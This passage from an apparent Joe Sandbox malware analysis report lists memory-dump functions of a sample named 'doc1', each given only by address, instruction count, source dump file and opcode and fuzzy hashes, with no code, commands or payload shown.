                            • Instruction ID: 0cdaf5db22dc32b1f4db74c7063e1f7c089183739a2338af8ce2293906d3316c
                            • Opcode Fuzzy Hash: 9c0115eaf1c0de2737f43be7de51e201807cf33ef8a69f5a8c922e3fa9241d3a
                            • Instruction Fuzzy Hash: CFF05F749022289FDB60DF64DD44BDDBBB1BB09300F0080D9E949B3250D6355E90CF44
                            Function 0581B8C3 Relevance: 1.3, Strings: 1, Instructions: 21COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID: )
                            • API String ID: 0-2427484129
                            • Opcode ID: 4516f4ba2533fe9632ee08c0853abe55e4214be492807f8b5f85f62e096e2b2e
                            • Instruction ID: f16bd78fff3c54f88edb7b4ad90799bb8ae0b85a0716d6fa4ba1fac639028129
                            • Opcode Fuzzy Hash: 4516f4ba2533fe9632ee08c0853abe55e4214be492807f8b5f85f62e096e2b2e
                            • Instruction Fuzzy Hash: 7FF07474A012198FDB54DF65D894A9DB7B5AB85300F50849AC40DA7341DA31AE85CF50
                            Function 0576DBEA Relevance: 1.3, Strings: 1, Instructions: 20COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: d3ceb496be4ea6469dbeb7fde089fce6a0e85bdcc5fa62d1375db37ad1322d12
                            • Instruction ID: f0ded5fcbfe9b1c975519803170863d5af375e3f637efc2e3ae316058329bc7c
                            • Opcode Fuzzy Hash: d3ceb496be4ea6469dbeb7fde089fce6a0e85bdcc5fa62d1375db37ad1322d12
                            • Instruction Fuzzy Hash: 0AF09874A0025DCFDB64DFA8D894BDEB7B2EB85310F2091969809B7348DA305EC5CF61
                            Function 0576E23D Relevance: 1.3, Strings: 1, Instructions: 20COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: 688fc11c6d436fd64b22f1cb02407787b07d9bc37d7074b2955eb6db3ecb0fba
                            • Instruction ID: 549e5b8a64a9107afdd03cdbbe365842b9655ce8451f3db96313795e96b8adb3
                            • Opcode Fuzzy Hash: 688fc11c6d436fd64b22f1cb02407787b07d9bc37d7074b2955eb6db3ecb0fba
                            • Instruction Fuzzy Hash: F0F01C74A01218CFDB64EF64D85478AB7B2FB84300F1065AAD419B7388DB314DC5CF51
                            Function 0581C823 Relevance: 1.3, Strings: 1, Instructions: 19COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: 883281b83883d8b291accb3a3074078a1b3602c3cad4d0b9964cc0d7ed3f16ca
                            • Instruction ID: 272d595625efd65428748c53e5535cb3057716ab66cfdb61fca316a36c39b31d
                            • Opcode Fuzzy Hash: 883281b83883d8b291accb3a3074078a1b3602c3cad4d0b9964cc0d7ed3f16ca
                            • Instruction Fuzzy Hash: 7AE0127490411D9FCB24DF64C855BDE7BFDFB49300F0041969A19E7385DA354A85DFA0
                            Function 0576DF2F Relevance: 1.3, Strings: 1, Instructions: 18COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: 6c571916020a1973b292d87c652b2dc39bc30dca1e210a08f969b65e4e4656b9
                            • Instruction ID: cde31a80d424f66b23ff022b39eeab0d818fae07b2d92cb92861392e1d5d87d3
                            • Opcode Fuzzy Hash: 6c571916020a1973b292d87c652b2dc39bc30dca1e210a08f969b65e4e4656b9
                            • Instruction Fuzzy Hash: EAE0E5B4A01218CFCB20DF24D8997D9B772EF8A305F10909A940AA7294CB719989CF81
                            Function 0581B6C8 Relevance: 1.3, Strings: 1, Instructions: 16COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID: )
                            • API String ID: 0-2427484129
                            • Opcode ID: 8fe97c96fdb1e52d9ffa327be56f32d57c2d1a4ebd3de37fd3b117a1bf07d18b
                            • Instruction ID: 786615bc703b825bf94241e4f093f3124db1a894631516943936de5e2bf5908b
                            • Opcode Fuzzy Hash: 8fe97c96fdb1e52d9ffa327be56f32d57c2d1a4ebd3de37fd3b117a1bf07d18b
                            • Instruction Fuzzy Hash: CEE09278A0031CCFCB50CF54D898A99B7B9AB89305F14869AC81AE7351D731EE8ACF40
                            Function 0581635A Relevance: 1.3, Strings: 1, Instructions: 16COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: 5eaf8906a7428e27dbf190aa8e37bc042ed93bb28a41f9a33ccd2f5fd9c382b0
                            • Instruction ID: c6c5cdf4ecce7b938b5765d63e16a54409c4c87b2bc4796fead08f8be0bfec0b
                            • Opcode Fuzzy Hash: 5eaf8906a7428e27dbf190aa8e37bc042ed93bb28a41f9a33ccd2f5fd9c382b0
                            • Instruction Fuzzy Hash: CDE04F308053188BDB20CFA0C4043ED7BB9EB86304F108095C945A72C4C7B909C9CF40
                            Function 0581AA2D Relevance: 1.3, Strings: 1, Instructions: 16COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: 6e41939669b831b9cf5b8bc45a52938269e76e1bed50ac6864da38335f98b7b9
                            • Instruction ID: 4382a26617f276c7bb6fe57bec2b5a5b97c9ff635e280f13065f3635920f7ba2
                            • Opcode Fuzzy Hash: 6e41939669b831b9cf5b8bc45a52938269e76e1bed50ac6864da38335f98b7b9
                            • Instruction Fuzzy Hash: 29E0EC34501208AFCF15DFD4C900E9D7B7BEB89314F109110ED166B298C7354D95DB84
                            Function 0576DC54 Relevance: 1.3, Strings: 1, Instructions: 16COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: 72463c3bbba873fe20e7633a9558a7c1c7ffdba102ad32425f7e03d0363e1c97
                            • Instruction ID: 001476c964762dc8e8d5c0071af2a3d3e7ada76b2e3392763c2edcd3fae661d5
                            • Opcode Fuzzy Hash: 72463c3bbba873fe20e7633a9558a7c1c7ffdba102ad32425f7e03d0363e1c97
                            • Instruction Fuzzy Hash: 06E04F34A001188FC728DF20D9567EDB7B2EB85701F1094A9D50AB33D4CB301E84CF62
                            Function 0576DF87 Relevance: 1.3, Strings: 1, Instructions: 16COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: 598edfd20ceed3a9f77391d7a1dbac2d222600763a1efb01acaf3bb447ba9d6c
                            • Instruction ID: 7766d5951995945cad5715f672bbe5f8ac67fef1b1a9dd05f256128fcd0ea292
                            • Opcode Fuzzy Hash: 598edfd20ceed3a9f77391d7a1dbac2d222600763a1efb01acaf3bb447ba9d6c
                            • Instruction Fuzzy Hash: 64E01A30A08218CFC764DFA0D8997E9B7B2EB89301F1050AAD49AB7384CB701EC5CF11
                            Function 0576D9B6 Relevance: 1.3, Strings: 1, Instructions: 16COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: 957f5dcf88056bd4eb0d68ce66e7bc6a0430b063d6bb96f0e3ec62dbcd7e3248
                            • Instruction ID: c086338a8645a9bb82e49e6e273e6768a0b2051191a07851415a32a35330cb72
                            • Opcode Fuzzy Hash: 957f5dcf88056bd4eb0d68ce66e7bc6a0430b063d6bb96f0e3ec62dbcd7e3248
                            • Instruction Fuzzy Hash: 23E01A34A05218CFDB24DF60D855B9DB7B6EB89310F2098A9940AB3294CB325EC58F52
                            Function 0576DB95 Relevance: 1.3, Strings: 1, Instructions: 16COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: 204a44cb9d78638a872ec6331b5f52e58afe6becc37df666a1215caceaf565bd
                            • Instruction ID: f30cab24eaefb9dc7d9f300efdb5bb40db87b76b7ef1c2641d268cb9b11b3e7e
                            • Opcode Fuzzy Hash: 204a44cb9d78638a872ec6331b5f52e58afe6becc37df666a1215caceaf565bd
                            • Instruction Fuzzy Hash: 49E01A74A021188FD764DF20DC95B9DB7B2EB85300F1090A9D009B7384CB301EC9CF16
                            Function 05815305 Relevance: 1.3, Strings: 1, Instructions: 11COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: 5180fe163a0bf7891a1b3d0382e14221413b0d35d88de6e6585554366d3a373c
                            • Instruction ID: e660c31da51ee446068bc1a696a08843cc8083e2e71d26b55c08f81c346177ec
                            • Opcode Fuzzy Hash: 5180fe163a0bf7891a1b3d0382e14221413b0d35d88de6e6585554366d3a373c
                            • Instruction Fuzzy Hash: CCD05E308042588FD710DF61C4103AD7BBAEB86304F1080A5C455A62C8C6794985CF40
                            Function 057615CA Relevance: 1.3, Strings: 1, Instructions: 10COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID: >
                            • API String ID: 0-325317158
                            • Opcode ID: 9855390ee3b15366df7bbf36d5f3d69de778a1aa96a1f9c727dd054b6983333b
                            • Instruction ID: dceadb863881977335282a5a3079e3b624fe5ae0b9720ab0bbaf2169fff8c26d
                            • Opcode Fuzzy Hash: 9855390ee3b15366df7bbf36d5f3d69de778a1aa96a1f9c727dd054b6983333b
                            • Instruction Fuzzy Hash: C3D092789063088BCB44CF64C588A9DBBF1AB08300F109289A508B7390DB309E84CF40
                            Function 05761491 Relevance: 1.3, Strings: 1, Instructions: 10COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID: g
                            • API String ID: 0-30677878
                            • Opcode ID: 681943317ee287068c375bf688992aad880819117dc9b3aa2f532ae2cfd6d398
                            • Instruction ID: e4ed427608fdbe6291ab2ae3ce11916036903f85c587484e0f3577ff1045fb8c
                            • Opcode Fuzzy Hash: 681943317ee287068c375bf688992aad880819117dc9b3aa2f532ae2cfd6d398
                            • Instruction Fuzzy Hash: 56D09274A142688BCFA4CF24C888B9DB7B2AB45314F2095DA940DB3240DB305ED4CF05
                            Function 0576D851 Relevance: 1.3, Strings: 1, Instructions: 9COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: e83cc9169c323b576bb3835b455a98f01750dde2dd448229008e69b6fcf249fb
                            • Instruction ID: 3159c15df35868735b42ff0a284638aa9ae4a591986db1238940019588292337
                            • Opcode Fuzzy Hash: e83cc9169c323b576bb3835b455a98f01750dde2dd448229008e69b6fcf249fb
                            • Instruction Fuzzy Hash: 79C08CB0218119CBD724AF60C4242E9723BE7C4301F00542898133B7CDCB34488A9792
                            Function 057E8F00 Relevance: .7, Instructions: 677COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304206739.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57e0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f2c8ce7eb46de87fbd709a2f987244f1bea9066089245618e99d0b617da00ded
                            • Instruction ID: 5a644799ada555f6b0c3e69bee44988368d361213de76e3fd8b1c89207f7371a
                            • Opcode Fuzzy Hash: f2c8ce7eb46de87fbd709a2f987244f1bea9066089245618e99d0b617da00ded
                            • Instruction Fuzzy Hash: 26522C75A002288FDB64CF68C995BEDBBF6BF88300F1581D9E509A7391DA309D81DF61
                            Function 055D0D98 Relevance: .6, Instructions: 577COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2303537237.00000000055D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_55d0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f77354790cc5dda2ae888f1d6b31c44026fa3a1042645bab71f9923b021f8f6a
                            • Instruction ID: 3594cd06939c5fc7277897a5bb547c8c8c2bae3ff99045dba501859925601d25
                            • Opcode Fuzzy Hash: f77354790cc5dda2ae888f1d6b31c44026fa3a1042645bab71f9923b021f8f6a
                            • Instruction Fuzzy Hash: C942C235E04609CFDB24DBA9D498AFEFBB2FB89301F108429D512A7395D7345982CFA1
                            Function 057E3440 Relevance: .5, Instructions: 534COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304206739.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57e0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0f595b886394227675791f8ff4072868f0134eb1fa9f1e76e7ee87d9f4bcc7e1
                            • Instruction ID: cbade70caa1777f41b4f204aa55cc73c72ff94f69771d9a54912c9e289e0cde1
                            • Opcode Fuzzy Hash: 0f595b886394227675791f8ff4072868f0134eb1fa9f1e76e7ee87d9f4bcc7e1
                            • Instruction Fuzzy Hash: 20227875A002059FDB04DFA9D494A6DBBF2FF88310F148469E906EB3A5DB71ED81CB90
                            Function 057E2858 Relevance: .5, Instructions: 526COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304206739.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57e0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 92ad16019d8a5a291d371ffbf35c5dd058be81cd0a3dc6dbf3572609e3e49dc2
                            • Instruction ID: 1b952edf6bd82943c89fa57e3389e20374907707ebe8b790ae07fbaa5fa25c18
                            • Opcode Fuzzy Hash: 92ad16019d8a5a291d371ffbf35c5dd058be81cd0a3dc6dbf3572609e3e49dc2
                            • Instruction Fuzzy Hash: 33228C34A00329CFDB15DFA5C958ABDBBB6FF88311F148015E812A7395DB34E942DBA0
                            Function 058196CD Relevance: .5, Instructions: 520COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b56a978125fda7159d3b958cfd65b4026ce0af15d4a72ed97f49721f6db8e108
                            • Instruction ID: 8b1555c5db7ed5cd57943bfdd99c192510391ad7009e2ee06baf5b0eb9111728
                            • Opcode Fuzzy Hash: b56a978125fda7159d3b958cfd65b4026ce0af15d4a72ed97f49721f6db8e108
                            • Instruction Fuzzy Hash: A9E0123304D2C48FE316CB25986C6A53FB8AB17205B1994D7CC45DB473C6645445CB15
                            Function 057E6360 Relevance: .5, Instructions: 481COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304206739.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57e0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: cac67f900da0fc73e25a23e43099df949b7afa0ab1911a7d23887bed08c31a45
                            • Instruction ID: f9b8c8c326cd995dc1a3e56e45a8fb9a68f4478cf06e0152938d304809729268
                            • Opcode Fuzzy Hash: cac67f900da0fc73e25a23e43099df949b7afa0ab1911a7d23887bed08c31a45
                            • Instruction Fuzzy Hash: FF124A71A003048FDB24DFA5E494A6EBBF6FF99300F14852DE506AB395DB31AC46DB50
                            Function 057EC308 Relevance: .4, Instructions: 437COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304206739.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57e0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fdc473495a8cfdbce7ed1d18f6eb7e3269c9e1d1465b100eccbc023d38e980aa
                            • Instruction ID: 30d3ff51166dfe4015f4290c12daa4dd2c54c7651c7c0d43392de71aca92c494
                            • Opcode Fuzzy Hash: fdc473495a8cfdbce7ed1d18f6eb7e3269c9e1d1465b100eccbc023d38e980aa
                            • Instruction Fuzzy Hash: A712FD34B103198FCB14EF64C898A9DB7B6BF89300F5085A8E54AAB355DF30ED85DB50
                            Function 05A9F6C8 Relevance: .4, Instructions: 387COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304800385.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5a80000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2c1a57439b82f94da89b5611fc68d6be3cd628120967abaa4ce90d151486bee6
                            • Instruction ID: 48e3ed77bf2f4ac0e583379d0e55f5c5a2345ae2a37cf9bad6e523a7b32565e0
                            • Opcode Fuzzy Hash: 2c1a57439b82f94da89b5611fc68d6be3cd628120967abaa4ce90d151486bee6
                            • Instruction Fuzzy Hash: 51E17B35B012159FCB1ADF68E494EADBBF2FF89310F148069E816DB291DB71D941CB60
                            Function 057E8020 Relevance: .4, Instructions: 370COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304206739.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57e0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2f86086411384d80b855f4db28408b56fe26aebdaeb75314cd552dac9eabde88
                            • Instruction ID: dd5a6b407c97fe61c9dfde70ec316b91c81fb1a80a9c5f746d11639e0d6b8c79
                            • Opcode Fuzzy Hash: 2f86086411384d80b855f4db28408b56fe26aebdaeb75314cd552dac9eabde88
                            • Instruction Fuzzy Hash: 00F1CA34B10218DFCB18DFA4D998A9DBBB2FF89300F118559E806AB365DB71EC42DB51
                            Function 057ECA00 Relevance: .4, Instructions: 363COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304206739.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57e0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 71114efc5d521412178e46397a17ed42c18a27adf19724444c1eda2c02477526
                            • Instruction ID: 22fec5c17a2c810913cf0bf6c9cc503dbcaa2f770ac825cbe6d0f404c9578ba8
                            • Opcode Fuzzy Hash: 71114efc5d521412178e46397a17ed42c18a27adf19724444c1eda2c02477526
                            • Instruction Fuzzy Hash: 5BE13234B10208DFCB19EF64D4989ADBBB6FF89310F108569E406AB365DB30ED42DB91
                            Function 055D18C0 Relevance: .4, Instructions: 362COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2303537237.00000000055D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_55d0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9f81254937854ac1ae9160d31a8bd7f4b762e9ef849c6c3b35781e3ed467696d
                            • Instruction ID: 63647dd45b25d7ff8cd85c91316e42f59fef5181f5c7ec331f719aba88bd4e6f
                            • Opcode Fuzzy Hash: 9f81254937854ac1ae9160d31a8bd7f4b762e9ef849c6c3b35781e3ed467696d
                            • Instruction Fuzzy Hash: 22F1D235E01608DFCB28DFA9D4986ECBBB2FF89301F20802AE416A7391DB355985CF50
                            Function 057E8EF0 Relevance: .3, Instructions: 290COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304206739.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57e0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c3714fea92121a76a75192428308aa945b471b668702da49aa7009cc015dcad3
                            • Instruction ID: c8a0a412c6886bf506cc4184fe15dc3df66dae83ef7d058d62ae35f798fc858b
                            • Opcode Fuzzy Hash: c3714fea92121a76a75192428308aa945b471b668702da49aa7009cc015dcad3
                            • Instruction Fuzzy Hash: 8EC16E75A002288FDB18DF68C955BDDBBF6BF88700F158099E609AB391DA309D81CF61
                            Function 057E8EF7 Relevance: .3, Instructions: 286COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304206739.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57e0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 732307c033d24d2f52875229b71747915f03cbaf0e78ec4e6f113f411fc28f56
                            • Instruction ID: cf11a58e5509c4366a4445a7da913da2932a70a477fcea5f6693e86f48ba8eaf
                            • Opcode Fuzzy Hash: 732307c033d24d2f52875229b71747915f03cbaf0e78ec4e6f113f411fc28f56
                            • Instruction Fuzzy Hash: B8C16D75A002288FDB18DF68C955BDDBBF6FF88700F158099E609AB391DA709D81CF61
                            Function 057E8010 Relevance: .2, Instructions: 240COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304206739.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57e0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b4e58462320b58d8fcabfc5868b36f4149daa9126b10056ac9d71ba33a0186c4
                            • Instruction ID: def87a06bfb3660b4fa53f4ad3e10ea6dd3cf5b939857bda73b16eb79e8f9881
                            • Opcode Fuzzy Hash: b4e58462320b58d8fcabfc5868b36f4149daa9126b10056ac9d71ba33a0186c4
                            • Instruction Fuzzy Hash: 07B1D934A10218DFCB08DFA4D898E9DBBB2FF89310F158559E506AB365DB31EC42DB91
                            Function 055D1598 Relevance: .2, Instructions: 231COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2303537237.00000000055D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_55d0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b69c4864c4c9edb2dbbeaa774227ab4c2c456ab913046d2c3deecae1253e32ba
                            • Instruction ID: 52a834209f96cd4421d9b829ff18a43543835268285dca27a42dd6712b9dd0d1
                            • Opcode Fuzzy Hash: b69c4864c4c9edb2dbbeaa774227ab4c2c456ab913046d2c3deecae1253e32ba
                            • Instruction Fuzzy Hash: CFA1B475E04609CFCB29DFA9D458AEDBBB2BF89301F108429D412B7391DB355986CFA0
                            Function 057ED2B0 Relevance: .2, Instructions: 223COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304206739.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57e0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 67b6a68a9320b85810b4ca5edae1ae74833e1288548da5d40110d52ced980864
                            • Instruction ID: 27e187d33a346381a4c60277874861ccded5181afd44da12cf19bae27c69288b
                            • Opcode Fuzzy Hash: 67b6a68a9320b85810b4ca5edae1ae74833e1288548da5d40110d52ced980864
                            • Instruction Fuzzy Hash: 09912874710214DFCB14EF68D498A6DBBB6BF8D610F1480A9E906DB3A5CB34EC42DB91
                            Function 057E4D28 Relevance: .2, Instructions: 208COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304206739.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57e0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4ece7016bf5d1ea23deca7a02d8d89a2dff8222f21d0bf83648324f069959143
                            • Instruction ID: ca7f7464d3c466afeba4a5f0ecec9de99d997f9efa11a4e108cea9d7d10cdeed
                            • Opcode Fuzzy Hash: 4ece7016bf5d1ea23deca7a02d8d89a2dff8222f21d0bf83648324f069959143
                            • Instruction Fuzzy Hash: DE81D575A00618CFCB14DF69C884E9EBBF6BF88710B1585A9E916DB361DB30ED41CB90
                            Function 057E444B Relevance: .2, Instructions: 183COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304206739.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
